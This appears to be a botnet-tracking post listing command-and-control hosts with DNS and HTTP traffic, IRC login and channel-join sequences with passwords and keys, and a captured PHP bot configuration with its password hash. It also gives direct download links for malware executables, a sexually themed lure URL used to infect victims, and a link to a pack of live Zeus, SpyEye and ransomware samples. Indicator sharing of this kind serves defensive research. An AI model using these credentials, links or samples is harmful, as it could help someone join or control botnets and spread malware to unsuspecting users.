– DNS Queries:
envc.machcar.kr DNS_TYPE_A 222.24.94.15
vhosts.packmanbd.com DNS_TYPE_A 222.24.94.19 222.24.94.19
– HTTP Conversations:
222.24.94.15:80 – [envc.machcar.kr]
Request: POST /envc.php
Response: 200 "OK"
222.24.94.19:80 – [vhosts.packmanbd.com]
Request: GET /manual/vhosts.txt
Response: 200 "OK"
URL used to infect people: http://pedofilia.warbe.org/id/noticias/g1.globo.com/pedofilia/2011/0-19384pastor-e-filmado-fazendo-sexo-oral-com-adolescente.php?0.82545
Direct download: http://pedofilia.warbe.org/id/noticias/g1.globo.com/pedofilia/2011/videos-pedofilia-1039-pastor-fazendo-sexo-oral-com-adolescente-AVI.exe
Hosting info: http://whois.domaintools.com/122.160.131.225
ssh.mytijn.org (IRC botnet hosted in India, Bangalore, O/o Dgm Bb Noc Bsnl Bangalore)
Remote Host: ssh.mytijn.org, Port Number: 8782
PASS weed
NICK {iNF-00-USA-XP-COMP-1493}
USER blaze * 0 :COMP
NICK {00-USA-XP-COMP-6216}
Hosting info: http://whois.domaintools.com/117.211.84.155
area.myarena.ru (Destination Darkness Outcast System & Optima)
HTTP malware from Russia used for DDoS.
Admin panel: http://area.myarena.ru/ex/adm/auth.php
– DNS Queries:
area.myarena.ru DNS_TYPE_A 62.122.213.10
http://palmary73.net DNS_TYPE_A
– HTTP Conversations:
62.122.213.10:80 – [area.myarena.ru]
Request: GET /ex/?uid=035409&ver=9aXPA
Response: 200 "OK"
Request: GET /ex/adm/?uid=035409&ver=9aXPA
Response: 302 "Found"
Request: GET /ex/adm/auth.php
Response: 200 "OK"
Request: GET /ex/adm/index.php?uid=035409&ver=9aXPA
Response: 302 "Found"
Request: GET /ex/adm/auth.php
Response: 200 "OK"
Exe
178.211.58.11 (IRC botnet hosted in Turkey, Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)
Remote Host: 178.211.58.11, Port Number: 2525
NICK {ORG-XP-USA}756551
USER 7565 "" "TsGh" :7565
JOIN ##Kuzen bla
PONG :irc.clupversai.com
Now talking in ##Kuzen
Topic On: [ ##Kuzen ] [ ]
Topic By: [ OrgeneraL ]
Hosting info: http://whois.domaintools.com/178.211.58.11
safetysamvps.info (IRC botnet hosted in United States, Nashville, Psychz Networks)
safetysamvps.info:6667
Resolved : [safetysamvps.info] To [216.24.203.254]
EXE FILE: http://fanaras.gr/up/catroot.exe
If someone finds more info about this botnet, post it here.
Hosting info: http://whois.domaintools.com/216.24.203.254
91.211.117.155 (ngrBot hosted in Ukraine, Zharkov Mukola Mukolayovuch)
Remote Host: 213.251.170.52, Port Number: 80
Remote Host: 91.211.117.153, Port Number: 80
Remote Host: 91.211.117.155, Port Number: 1865
PASS ngrBot
NICK n{US|XPa}rwslldg
USER rwslldg 0 0 :rwslldg
JOIN #main 4m3r1k4
QUIT :rebooting
* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://91.211.117.153/070711.exe
Hosting info: http://whois.domaintools.com/91.211.117.155
92.241.164.229 (ngrBot hosted in Russian Federation, Oao Webalta)
Remote Host: 199.15.234.7, Port Number: 80
Remote Host: 92.241.164.229, Port Number: 7654
PASS ngrBot
NICK n{US|XPa}iyhylyn
USER iyhylyn 0 0 :iyhylyn
JOIN #oldgold noKIDs
JOIN #US
Hosting info: http://whois.domaintools.com/92.241.164.229
24 MB malware samples
ngrBot, SpyEye, Zeus, ransomware and more malware samples inside this package.
Download: http://adf.ly/21FL5
goim.hoodrich.ru (ngrBot hosted in United States, South Lake Tahoe, Reliablehosting.com – Network Services)
Remote Host: goim.hoodrich.ru, Port Number: 4042
PASS google_cache2.tmp
NICK [USA|XP]698545
USER 6985 "" "TsGh" :6985
JOIN #newbiz# abc
NICK n[USA|XP]576351
USER 5763 "" "TsGh" :5763
NICK [USA|XP]626543
USER 6265 "" "TsGh" :6265
Hosting info: http://whois.domaintools.com/216.131.127.13
gangbang.angels-agency.nl (large botnet of Linux bots hosted in China, Anhui, Chinanet Anhui Province Network)
Resolved : [gangbang.angels-agency.nl] To [223.244.227.2]
Resolved : [gangbang.angels-agency.nl] To [117.211.84.155]
UPDATE:
Resolved : [ gangbang.angels-agency.nl ] To [ 78.47.59.194 ]
Resolved : [ gangbang.angels-agency.nl ] To [ 223.244.227.2 ]
Resolved : [ gangbang.angels-agency.nl ] To [ 117.211.84.155 ]
Bot configuration (PHP, as captured):
var $config = array("server"=>"gangbang.angels-agency.nl",
"port"=>"25343",
"pass"=>"",
"maxrand"=>"1",
"chan"=>"#wWw#",
"chan2"=>"#wWw#",
"key"=>"scan",
"modes"=>"+p",
"password"=>"41aa15390e2efa34ac693c3bd7cb8e88", //p0w3r
"trigger"=>".",
"hostauth"=>"0wn3d.3u"
Hosting info: http://whois.domaintools.com/223.244.227.2